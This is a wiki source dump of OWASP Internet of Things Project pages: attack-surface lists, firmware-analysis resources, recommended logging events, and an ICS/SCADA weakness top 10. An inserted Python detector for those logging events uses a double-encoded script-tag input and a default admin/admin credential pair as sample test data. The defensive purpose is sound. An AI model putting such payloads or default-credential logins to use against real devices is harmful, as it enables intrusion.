* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
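Several of the events in the table above can be derived from the device's own request stream with a few counters and patterns. The detector below is an added example (not OWASP project code) that implements a subset of them: unsupported HTTP method, parameter length and character-class checks, double-encoded characters, multiple failed passwords, high rate of login attempts, an extra POST variable, a session whose source address changes, and a successful login with the factory-default administrator credentials. The thresholds, the allowed character set, the expected login fields, the default-credential pair and the request records are all constructed assumptions for the example.<br />

```python
"""Detectors for a subset of the IoT logging events listed above.

Added example, not part of the OWASP project. Each request record is a
dict built inline here (constructed sample data, not captured traffic);
inspect() returns the event names the device should log for it.
"""
from collections import defaultdict, deque
import re
from urllib.parse import unquote

SUPPORTED_METHODS = {"GET", "POST"}            # assumption: a small admin API
LOGIN_FIELDS = {"user", "password"}            # assumption: expected POST fields
MAX_PARAM_LEN = 64                             # assumption: longest legitimate value
ALLOWED_PARAM_CHARS = re.compile(r"^[A-Za-z0-9 ._@:-]*$")
FAILED_PW_THRESHOLD = 3                        # "Multiple Failed Passwords"
RATE_WINDOW, RATE_THRESHOLD = 60, 5            # login attempts per source IP per window
DEFAULT_ADMIN_CREDENTIALS = {("admin", "admin")}  # placeholder factory default


class EventDetector:
    def __init__(self):
        self.failed_by_user = defaultdict(int)
        self.attempts_by_ip = defaultdict(deque)
        self.session_ip = {}

    def inspect(self, rec):
        """Return the logging events triggered by one request record."""
        events = []
        params = rec.get("params", {})

        # Request Exceptions and Input Exceptions
        if rec["method"] not in SUPPORTED_METHODS:
            events.append("Attempt to Invoke Unsupported HTTP Method")
        for raw in params.values():
            once = unquote(raw)
            # still decodable after one pass: the value was encoded twice
            if once != raw and unquote(once) != once:
                events.append("Double Encoded Character")
            if len(once) > MAX_PARAM_LEN:
                events.append("Unexpected Quantity of Characters in Parameter")
            if not ALLOWED_PARAM_CHARS.match(once):
                events.append("Unexpected Type of Characters in Parameter")

        # Session Exceptions: the same session id arriving from a new source
        sid = rec.get("session")
        if sid:
            first_ip = self.session_ip.setdefault(sid, rec["ip"])
            if first_ip != rec["ip"]:
                events.append("Source Location Changes During Session")

        # Authentication Exceptions and Administrative Mode Events
        if rec["path"] == "/login":
            if set(params) - LOGIN_FIELDS:
                events.append("Additional POST Variable")
            window = self.attempts_by_ip[rec["ip"]]
            window.append(rec["ts"])
            while window and window[0] < rec["ts"] - RATE_WINDOW:
                window.popleft()
            if len(window) > RATE_THRESHOLD:
                events.append("High Rate of Login Attempts")
            user = params.get("user", "")
            if rec["outcome"] == "fail":
                self.failed_by_user[user] += 1
                if self.failed_by_user[user] >= FAILED_PW_THRESHOLD:
                    events.append("Multiple Failed Passwords")
            else:
                self.failed_by_user[user] = 0
                if (user, params.get("password")) in DEFAULT_ADMIN_CREDENTIALS:
                    events.append("Device Accessed Using Default Administrative Credentials")
        return events


def run_sample():
    """Feed constructed records through one detector; returns events per record."""
    base = dict(method="POST", path="/login", ip="10.0.0.5", session=None, outcome="fail")
    records = [
        dict(base, ts=1, params={"user": "bob", "password": "x"}),
        dict(base, ts=2, params={"user": "bob", "password": "y"}),
        dict(base, ts=3, params={"user": "bob", "password": "z"}),      # third failure
        dict(base, ts=4, params={"user": "admin", "password": "admin"}, outcome="ok"),
        dict(base, ts=5, method="TRACE", path="/", params={}),
        dict(base, ts=6, method="GET", path="/status", params={"id": "%253Cscript%253E"}),
        dict(base, ts=7, method="GET", path="/status", session="s1", params={}),
        dict(base, ts=8, method="GET", path="/status", session="s1", ip="198.51.100.9", params={}),
        dict(base, ts=9, params={"user": "bob", "password": "w", "debug": "1"}),
    ]
    det = EventDetector()
    return [det.inspect(r) for r in records]


if __name__ == "__main__":
    for i, ev in enumerate(run_sample()):
        print(i, ev)
```

Each detector keeps only the state it needs (per-user failure counts, a per-source sliding window of login timestamps, the first source seen per session), which is the kind of footprint a constrained device can afford; the event names are emitted verbatim so they can be forwarded to a collector without a second mapping step.<br />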
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems generally log far too few events to serve as input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246183OWASP Internet of Things Project2018-12-19T23:46:35Z<p>Aaron.guzman: /* Philosophy */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon this work, you distribute the resulting work only under the same or a similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
